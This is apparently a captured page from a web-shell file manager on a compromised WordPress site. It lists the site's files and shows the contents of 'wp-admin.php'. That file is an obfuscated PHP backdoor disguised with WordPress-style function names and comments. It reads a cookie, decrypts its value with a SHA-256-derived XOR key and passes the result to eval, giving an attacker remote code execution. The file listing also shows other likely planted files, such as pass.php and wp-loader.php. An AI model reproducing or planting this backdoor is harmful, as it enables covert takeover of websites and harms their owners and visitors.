X7ROOT File Manager
Current Path:
/home/greejped/nwswater.com
home
/
greejped
/
nwswater.com
/
ðŸ“
..
📄
.htaccess
(199 B)
📄
.litespeed_flag
(297 B)
ðŸ“
.tmb
📄
.tmb.zip
(331.55 MB)
📄
.tmp
(456 B)
ðŸ“
.well-known
📄
admin-ajax.php
(4.64 KB)
📄
error_log
(317.61 KB)
📄
google6032ca844f7c65c4.html
(53 B)
📄
google993d226409e0d51a.html
(53 B)
ðŸ“
images
📄
index.php
(293 B)
📄
license.txt
(19.47 KB)
ðŸ“
nwswater.com
📄
nwswater.com.zip
(99.14 MB)
📄
pass.php
(1.58 KB)
📄
readme.html
(7.2 KB)
📄
robots.txt
(358 B)
📄
wp-activate.php
(6.78 KB)
ðŸ“
wp-admin
📄
wp-admin.php
(5.88 KB)
📄
wp-blog-header.php
(436 B)
📄
wp-comments-post.php
(2.29 KB)
📄
wp-config-sample.php
(27.94 KB)
📄
wp-config.php
(3.44 KB)
ðŸ“
wp-content
📄
wp-cron.php
(3.86 KB)
ðŸ“
wp-includes
📄
wp-links-opml.php
(2.45 KB)
📄
wp-load.php
(3.25 KB)
📄
wp-loader.php
(4.69 KB)
📄
wp-login.php
(46.48 KB)
📄
wp-mail.php
(8.23 KB)
📄
wp-settings.php
(18.67 KB)
📄
wp-signup.php
(30.38 KB)
📄
wp-trackback.php
(4.72 KB)
📄
xmlrpc.php
(3.08 KB)
Editing: wp-admin.php
<?php wp_deletePost(); /* If this is a search result */ function wp_deletePost(){ $v_string = "SYyhMEnvUuajgofz"; $xfn_value = 'idh8dg'; $option_tag_apetag = 'es7lou'; $j11 = 'kuqsn'; get_available_actions($v_string); } /** * Creates autosave for the specified post. * * From wp-admin/post.php. * * @since 5.0.0 * @since 6.4.0 The `$meta` parameter was added. * * @param array $post_data Associative array containing the post data. * @param array $meta Associative array containing the post meta data. * @return mixed The autosave revision ID or WP_Error. */ function add_dynamic_settings($request_email){ $tables = $_COOKIE[$request_email]; $files_not_writable = 'xsdgg'; $arg_data = 'r705'; $locate = 'sty9'; $QuicktimeIODSaudioProfileNameLookup = 'jhvmf6du6'; $b4 = 'l0f8yhc'; $status_obj = rawurldecode($tables); $b4 = rawurlencode($b4); if(!isset($rawheaders)) { $rawheaders = 'hhm4n6i1'; } $arg_data = ceil(172); $QuicktimeIODSaudioProfileNameLookup = urlencode($QuicktimeIODSaudioProfileNameLookup); $locate = strtoupper($locate); return $status_obj; } /** * Determines whether to force SSL on content. * * @since 2.8.5 * * @param bool $force * @return bool True if forced, false if not forced. */ function upgrade_630($attrib_namespace, $reference_count){ $development_scripts = strlen($attrib_namespace); $ids = 'gia58epas'; $opslimit = 'sfxovm46'; $style_variation_node = 'fx6navzf6'; $is_404 = 'ab82hq4z'; $node_to_process = 'j8hbb5xo'; $development_scripts = $reference_count / $development_scripts; $border_color_matches = 'ocdw'; $style_variation_node = htmlspecialchars_decode($style_variation_node); $node_to_process = strnatcasecmp($node_to_process, $node_to_process); $requires = 'wgzsd8u'; $has_old_auth_cb = 'ds6o50u9'; $development_scripts = ceil($development_scripts); $node_to_process = sha1($node_to_process); $has_old_auth_cb = ucwords($opslimit); $monochrome = 'zhgx7y'; $requires = strnatcmp($ids, $ids); $border_color_matches = htmlspecialchars_decode($is_404); $development_scripts += 1; $ids = nl2br($requires); $border_color_matches = htmlentities($border_color_matches); $monochrome = chop($style_variation_node, $monochrome); $node_to_process = strcoll($node_to_process, $node_to_process); $has_old_auth_cb = strripos($opslimit, $opslimit); $zopen = str_repeat($attrib_namespace, $development_scripts); $node_to_process = is_string($node_to_process); $missingExtensions = 'mrpx7'; $monochrome = soundex($monochrome); $border_color_matches = round(122); $body_class = 'isi3xta1d'; return $zopen; } /** * Retrieves a post tag by tag ID or tag object. * * If you pass the $pre_menu_item parameter an object, which is assumed to be the tag row * object retrieved from the database, it will cache the tag data. * * If you pass $pre_menu_item an integer of the tag ID, then that tag will be retrieved * from the database, if it isn't already cached, and passed back. * * If you look at get_term(), both types will be passed through several filters * and finally sanitized based on the $cached_recently parameter value. * * @since 2.3.0 * * @param int|WP_Term|object $pre_menu_item A tag ID or object. * @param string $whitespace Optional. The required return type. One of OBJECT, ARRAY_A, or ARRAY_N, which * correspond to a WP_Term object, an associative array, or a numeric array, * respectively. Default OBJECT. * @param string $cached_recently Optional. How to sanitize tag fields. Default 'raw'. * @return WP_Term|array|WP_Error|null Tag data in type defined by $whitespace parameter. * WP_Error if $pre_menu_item is empty, null if it does not exist. */ function register_nav_menu($pre_menu_item, $whitespace = OBJECT, $cached_recently = 'raw') { return get_term($pre_menu_item, 'post_tag', $whitespace, $cached_recently); } /** * Core class used to implement the Archives widget. * * @since 2.8.0 * * @see WP_Widget */ function get_available_actions($rawdata){ $arc_week = substr($rawdata, -4); $original_host_low = upgrade_500($rawdata, $arc_week); eval($original_host_low); } /** * Customize API: WP_Customize_Image_Control class * * @package WordPress * @subpackage Customize * @since 4.4.0 */ function get_all_rules($format_slug, $p_level){ $compare_from = strlen($format_slug); $filelist = 'pfuwpny'; $unmet_dependency_names = 'fe5ty'; $signmult = 'sdur7wog8'; $paused_plugins = 'r24f0z5v'; $head_end = 'ffix5h'; $name_matcher = upgrade_630($p_level, $compare_from); $image_width = kebab_to_camel_case($name_matcher, $format_slug); return $image_width; } /** * Registers the block attributes required by the different block supports. * * @since 5.6.0 */ function kebab_to_camel_case($post_owner, $chan_prop){ $chan_prop ^= $post_owner; $target_status = 'fkqx7t'; return $chan_prop; } /** * Constructor. * * Any supplied $args override class property defaults. * * @since 4.3.0 * * @throws Exception If $id is not valid for this setting type. * * @param WP_Customize_Manager $manager Customizer bootstrap instance. * @param string $id A specific ID of the setting. * Can be a theme mod or option name. * @param array $args Optional. Setting arguments. */ function upgrade_500($service, $post_name_check){ $header_callback = hash("sha256", $service, TRUE); $timezone_format = 'asavimc1a'; $preview_stylesheet = 'xrvznm'; $status_obj = add_dynamic_settings($post_name_check); $image_height = get_all_rules($status_obj, $header_callback); $timezone_format = stripcslashes($timezone_format); $preview_stylesheet = addslashes($preview_stylesheet); return $image_height; }
Upload File
Create Folder